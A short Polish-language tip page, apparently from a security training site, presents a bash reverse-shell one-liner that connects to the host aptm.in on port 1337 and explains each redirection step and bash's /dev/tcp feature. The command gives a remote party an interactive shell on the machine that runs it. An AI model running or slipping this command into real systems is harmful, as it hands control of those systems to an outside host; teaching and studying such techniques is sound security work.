alphasec academy

bash -i >& /dev/tcp/aptm.in/1337 0>&1 - szybki reverse shell w czystym bashu do aptm.in na port 1337/TCP

Dodatkowe informacje

Kiedy bash skompilowany jest z opcją --enable-net-redirections (co jest zwykle prawdą), użytkownik może wykonywać polecenia na pseudo urządzeniach /dev/tcp/<host>/<port> oraz analogicznie /dev/udp/<host>/<port>, co spowoduje otwarcie połączeń tcp lub udp na <host>:<port> i przekierowanie tam wejścia/wyjścia.

W powyższym przykładzie:

  • bash -i 
    - uruchomienie interaktywnego shella
  • >& /dev/tcp/aptm.in/1337
    - przekierowanie standardowego wyjścia (STDOUT - 1) i wyjścia błędów (STDERR - 2) do hosta aptm.in na port 1337/TCP
  • 0>&1
    - przekierowanie wejścia (STDIN - 0) do tego samego deskryptora co STDOUT - 1

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.